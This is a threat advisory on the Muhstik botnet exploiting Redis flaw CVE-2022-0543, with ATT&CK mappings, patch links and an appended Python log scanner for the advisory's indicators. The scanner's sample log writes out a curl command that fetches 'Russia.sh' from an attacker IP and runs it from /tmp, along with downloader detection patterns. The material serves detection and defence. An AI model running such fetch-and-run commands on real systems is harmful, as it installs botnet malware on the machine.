History: Mar 29, 2022 - 12:17 p.m.

Muhstik botnet adds another vulnerability exploit to its arsenal

2022-03-29 12:17:03
Hive Pro
www.hivepro.com

EPSS score: 0.976 (High); EPSS percentile: 100.0%

THREAT LEVEL: Red. For a detailed advisory, download the pdf file here.

Muhstik malware has begun attacking Redis servers by exploiting a recently reported vulnerability, CVE-2022-0543. This flaw is present in several Redis Debian packages. The attack began on March 11, 2022, and was carried out by a threat actor who targeted Confluence servers in September 2021 and Log4j in December. The payload is a Muhstik bot variant that may be used to perform DDoS attacks.

The threat actor first executes Lua scripts to exploit the vulnerability in Redis Debian servers. The threat actor then attempts to download "Russia.sh" from "106[.]246.224.219" using wget or curl, stores it as "/tmp/russ" and runs it, which in turn downloads and runs Linux payloads from 160[.]16.58.163. These binaries have been recognized as Muhstik bot variants. The botnet then connects to an IRC server to receive commands that download files, run shell commands, and carry out attacks such as flood attacks and SSH brute-force attacks.

The MITRE ATT&CK TTPs commonly used by Muhstik malware are:
TA0001: Initial Access
TA0011: Command and Control
TA0042: Resource Development
TA0008: Lateral Movement
T1071: Application Layer Protocol
T1588.006: Obtain Capabilities: Vulnerabilities
T1190: Exploit Public-Facing Application
T1021.004: Remote Services: SSH
T1059.004: Command and Scripting Interpreter: Unix Shell

Vulnerability Details

Indicators of Compromise (IoCs)

Patch Links
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
https://security-tracker.debian.org/tracker/CVE-2022-0543
http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
https://github.com/g0rx/CVE-2018-7600-Drupal-RCE
https://jira.atlassian.com/browse/CONFSERVER-67940
https://logging.apache.org/log4j/2.x/manual/migration.html

References
https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers
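As an added defensive example (not part of the Hive Pro advisory), the following Python scanner flags the chain described above in log lines: Redis EVAL/EVALSHA calls as seen in MONITOR output, and downloader or execution activity touching the advisory's indicators (the two IP addresses, Russia.sh and /tmp/russ). The log formats and the sample lines are assumptions constructed here, not captured traffic.

```python
import re
from dataclasses import dataclass

# Indicators taken from the advisory above (de-fanged there, plain here so they match).
IOC_IPS = {"106.246.224.219", "160.16.58.163"}
IOC_PATHS = {"/tmp/russ", "russia.sh"}  # compared case-insensitively

# Redis MONITOR prints one command per line: <ts> [<db> <client>] "CMD" "arg" ...
MONITOR_RE = re.compile(r'^\d+\.\d+ \[\d+ (?P<client>\S+)\] "(?P<cmd>[A-Za-z]+)"(?P<args>.*)$')
DOWNLOADER_RE = re.compile(r"\b(wget|curl)\b")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

# Constructed sample input: two MONITOR lines and three process-exec audit lines.
SAMPLE_LOG = [
    '1646992345.123456 [0 203.0.113.7:41234] "EVAL" "return 1" "0"',
    '1646992345.223456 [0 10.0.0.12:50012] "GET" "session:abc"',
    'exec uid=999 cmd="curl -fsSL http://106.246.224.219/Russia.sh -o /tmp/russ"',
    'exec uid=999 cmd="sh /tmp/russ"',
    'exec uid=1000 cmd="wget http://mirror.example.net/pkg.deb -O /home/ops/pkg.deb"',
]


@dataclass
class Finding:
    line_no: int
    reason: str


def scan_lines(lines):
    """Return one Finding per suspicious line, in input order."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = MONITOR_RE.match(line)
        # EVAL/EVALSHA is how the Lua stage reaches the server; treat it as a triage
        # signal and baseline it against clients that legitimately run scripts.
        if m and m.group("cmd").upper() in ("EVAL", "EVALSHA"):
            findings.append(Finding(n, f"redis {m.group('cmd').upper()} from {m.group('client')}"))
            continue
        ips = sorted(ip for ip in IP_RE.findall(line) if ip in IOC_IPS)
        paths = sorted(p for p in IOC_PATHS if p in line.lower())
        if ips or paths:
            findings.append(Finding(n, "advisory IoC: " + ", ".join(ips + paths)))
        elif DOWNLOADER_RE.search(line) and "/tmp/" in line:
            # Generic fallback: wget/curl dropping files into /tmp, as the stager does.
            findings.append(Finding(n, "downloader writing into /tmp"))
    return findings


if __name__ == "__main__":
    for f in scan_lines(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.reason}")
```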